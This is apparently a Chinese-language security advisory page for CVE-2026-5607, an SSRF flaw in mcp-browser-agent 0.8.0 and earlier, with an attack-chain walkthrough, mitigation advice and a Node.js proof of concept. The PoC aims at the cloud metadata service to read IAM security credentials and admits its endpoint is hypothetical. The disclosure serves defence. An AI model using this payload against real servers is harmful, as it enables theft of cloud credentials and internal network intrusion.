CVE-2026-5607 CVSS 6.3 中危

CVE-2026-5607 mcp-browser-agent SSRF漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5607

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

imprvhub mcp-browser-agent

漏洞概述

imprvhub mcp-browser-agent 0.8.0 及之前版本存在安全漏洞。该漏洞位于组件 URL Parameter Handler 的 src/handlers.ts 文件 CallToolRequestSchema 函数中。攻击者通过操纵 request.params.name 或 request.params.arguments 参数，可导致服务器端请求伪造 (SSRF)。由于攻击可远程发起且利用代码已公开，对系统安全性构成中等风险。

技术细节

该漏洞的根本原因在于对用户输入的验证不足。在 `src/handlers.ts` 文件中，`CallToolRequestSchema` 函数负责处理来自 URL 参数的请求。具体而言，当处理 `request.params.name` 或 `request.params.arguments` 时，程序未对这些参数进行严格的格式校验或白名单限制。攻击者可以构造特制的恶意请求，将内部网络地址（如 127.0.0.1、169.254.169.254）或受限协议（如 file://）注入到上述参数中。由于 mcp-browser-agent 可能具备代理或转发请求的能力，服务器会解析这些参数并发起未经授权的请求。这种利用方式使得攻击者能够利用服务器的身份探测内网拓扑、读取本地元数据或攻击内部脆弱服务，属于典型的服务器端请求伪造漏洞。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用易受攻击的 imprvhub mcp-browser-agent 版本（0.8.0 或更低）。

STEP 2

构造恶意载荷

攻击者构造包含恶意参数的请求，将 request.params.name 或 request.params.arguments 设置为内部目标地址（如 AWS 元数据服务）。

STEP 3

发送请求

攻击者向存在漏洞的 CallToolRequestSchema 端点发送特制的 HTTP 请求。

STEP 4

服务器端请求

由于缺乏验证，服务器解析参数并向攻击者指定的内部地址发起请求。

STEP 5

信息泄露

服务器将内部服务的响应返回给攻击者，导致敏感信息泄露或进一步的内网渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-5607
// Target: imprvhub mcp-browser-agent <= 0.8.0
// Description: Exploiting SSRF via CallToolRequestSchema

const http = require('http');

// Malicious payload targeting internal metadata
const payload = JSON.stringify({
  name: "read_file", // Manipulating request.params.name
  arguments: {
    path: "http://169.254.169.254/latest/meta-data/iam/security-credentials/" // Manipulating request.params.arguments
  }
});

const options = {
  hostname: 'TARGET_HOST',
  port: TARGET_PORT,
  path: '/api/call-tool', // Hypothetical endpoint based on handler context
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': Buffer.byteLength(payload)
  }
};

const req = http.request(options, (res) => {
  console.log(`Status: ${res.statusCode}`);
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});

req.on('error', (error) => {
  console.error(error);
});

req.write(payload);
req.end();

影响范围

imprvhub mcp-browser-agent <= 0.8.0

防御指南

临时缓解措施

如果无法立即升级，建议在网络层面实施严格的出站访问控制列表 (ACL)，禁止服务器访问内部 IP 段（如 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）和云元数据服务（如 169.254.169.254）。同时监控异常的出站网络流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5607
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5607
3 Details https://www.cvedetails.com/cve/CVE-2026-5607/
4 VulDB https://vuldb.com/cve/CVE-2026-5607
5 Link https://github.com/wing3e/public_exp/issues/25
6 Link https://vuldb.com/submit/785034
7 Link https://vuldb.com/vuln/355398
8 Link https://vuldb.com/vuln/355398/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表